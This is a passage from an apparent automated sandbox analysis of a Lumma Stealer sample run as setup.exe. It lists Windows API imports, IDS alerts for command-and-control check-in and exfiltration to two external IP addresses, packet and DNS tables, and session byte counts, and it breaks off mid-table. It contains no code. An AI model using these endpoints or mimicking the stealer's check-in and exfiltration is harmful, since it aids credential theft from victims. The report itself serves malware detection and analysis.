GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassInfoW, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, ExitWindowsEx, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcW, CallWindowProcA, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuA, CharPrevA, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemBuffA, AdjustWindowRectEx |
comctl32.dll | ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls |
ole32.dll | CoTaskMemFree, CLSIDFromProgID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID |
oleaut32.dll | GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString |
shell32.dll | ShellExecuteExA, ShellExecuteA, SHGetFileInfoA, ExtractIconA |
shell32.dll | SHChangeNotify, SHBrowseForFolder, SHGetPathFromIDList, SHGetMalloc |
comdlg32.dll | GetSaveFileNameA, GetOpenFileNameA |
ole32.dll | CoDisconnectObject |
advapi32.dll | AdjustTokenPrivileges |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States | |
Chinese | China |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T15:26:18.078230+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:18.576159+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:18.576159+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:19.141494+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:19.583691+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:19.583691+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:20.232927+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:20.821930+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:21.479323+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49749 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:22.665292+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49760 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:24.288140+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49772 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:25.484416+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49779 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:30.959508+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:31.425192+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:32.302034+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49823 | 185.161.251.21 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 7, 2025 15:26:17.583905935 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:17.583970070 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:17.584073067 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:17.587498903 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:17.587532043 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.078116894 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.078229904 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.081257105 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.081262112 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.081666946 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.125360012 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.139390945 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.139425993 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.139532089 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.576172113 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.576281071 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.576523066 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.578061104 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.578082085 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.578094959 CET | 49726 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.578100920 CET | 443 | 49726 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.585243940 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.585295916 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:18.585395098 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.585757971 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:18.585777044 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.141428947 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.141494036 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.143877029 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.143888950 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.144145012 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.145802975 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.145828962 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.145869970 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.583719015 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.583792925 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.583818913 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.583842039 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.583861113 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.583901882 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.583908081 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.584610939 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.584661961 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.584675074 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.584863901 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.584908962 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.584916115 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588386059 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588417053 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588442087 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.588443995 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588454008 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588490963 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.588495970 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588535070 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588538885 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.588574886 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.588691950 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.588711977 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.588721037 CET | 49732 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.588726044 CET | 443 | 49732 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.753062010 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.753108025 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:19.753211975 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.753536940 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:19.753554106 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.232834101 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.232927084 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.234347105 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.234353065 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.234595060 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.235862017 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.236035109 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.236063957 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.821940899 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.822033882 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.822314024 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.822374105 CET | 49742 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.822396040 CET | 443 | 49742 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.927736998 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.927772045 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:20.927840948 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.928217888 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:20.928231955 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.479233980 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.479322910 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:21.480642080 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:21.480658054 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.480904102 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.482192993 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:21.482331038 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:21.482356071 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.482414007 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:21.527342081 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.995887995 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.996015072 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:21.996079922 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.000313997 CET | 49749 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.000335932 CET | 443 | 49749 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.188751936 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.188802004 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.188991070 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.189325094 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.189337015 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.665229082 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.665292025 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.666543961 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.666553020 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.666791916 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.667973995 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.668133020 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.668164968 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:22.668216944 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:22.668225050 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:23.299185038 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:23.299283028 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:23.299386978 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:23.299763918 CET | 49760 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:23.299787998 CET | 443 | 49760 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:23.811206102 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:23.811248064 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:23.811361074 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:23.811825991 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:23.811839104 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.287530899 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.288140059 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:24.296412945 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:24.296433926 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.296715021 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.298532009 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:24.298886061 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:24.298896074 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.744048119 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.744143009 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:24.744391918 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:24.744391918 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.004736900 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.004798889 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:25.004868984 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.005532026 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.005547047 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:25.047332048 CET | 49772 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.047357082 CET | 443 | 49772 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:25.484349966 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:25.484416008 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.487384081 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.487396002 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:25.487677097 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:25.489001036 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.489124060 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:25.489130020 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.481734991 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.481869936 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.481995106 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.482156038 CET | 49779 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.482183933 CET | 443 | 49779 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.485601902 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.485651970 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.485726118 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.486093044 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.486109972 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.959435940 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.959507942 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.961389065 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.961400986 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.961652994 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:30.962930918 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.962953091 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:30.963002920 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:31.425195932 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:31.425290108 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:31.425362110 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:31.425621033 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:31.425638914 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:31.425651073 CET | 49816 | 443 | 192.168.2.7 | 188.114.97.3 |
Jan 7, 2025 15:26:31.425657034 CET | 443 | 49816 | 188.114.97.3 | 192.168.2.7 |
Jan 7, 2025 15:26:31.570050001 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:31.570077896 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:31.570163012 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:31.570489883 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:31.570502996 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.301898003 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.302033901 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:32.317498922 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:32.317527056 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.317814112 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.319176912 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:32.359344006 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.564456940 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.564541101 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.564703941 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:32.580003977 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:32.580025911 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 15:26:32.580039978 CET | 49823 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 15:26:32.580045938 CET | 443 | 49823 | 185.161.251.21 | 192.168.2.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 7, 2025 15:26:17.562438965 CET | 55627 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 15:26:17.577310085 CET | 53 | 55627 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 15:26:31.463399887 CET | 62915 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 15:26:31.568305969 CET | 53 | 62915 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 15:26:32.661422014 CET | 52301 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 15:26:32.670677900 CET | 53 | 52301 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 7, 2025 15:26:17.562438965 CET | 192.168.2.7 | 1.1.1.1 | 0xcec4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 15:26:31.463399887 CET | 192.168.2.7 | 1.1.1.1 | 0x4e3a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 15:26:32.661422014 CET | 192.168.2.7 | 1.1.1.1 | 0xafe2 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 7, 2025 15:26:17.577310085 CET | 1.1.1.1 | 192.168.2.7 | 0xcec4 | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 15:26:17.577310085 CET | 1.1.1.1 | 192.168.2.7 | 0xcec4 | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 15:26:31.568305969 CET | 1.1.1.1 | 192.168.2.7 | 0x4e3a | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 15:26:32.670677900 CET | 1.1.1.1 | 192.168.2.7 | 0xafe2 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:18 UTC | 262 | OUT | |
2025-01-07 14:26:18 UTC | 8 | OUT | |
2025-01-07 14:26:18 UTC | 1125 | IN | |
2025-01-07 14:26:18 UTC | 7 | IN | |
2025-01-07 14:26:18 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:19 UTC | 263 | OUT | |
2025-01-07 14:26:19 UTC | 78 | OUT | |
2025-01-07 14:26:19 UTC | 1121 | IN | |
2025-01-07 14:26:19 UTC | 248 | IN | |
2025-01-07 14:26:19 UTC | 887 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN | |
2025-01-07 14:26:19 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:20 UTC | 272 | OUT | |
2025-01-07 14:26:20 UTC | 12789 | OUT | |
2025-01-07 14:26:20 UTC | 1122 | IN | |
2025-01-07 14:26:20 UTC | 20 | IN | |
2025-01-07 14:26:20 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
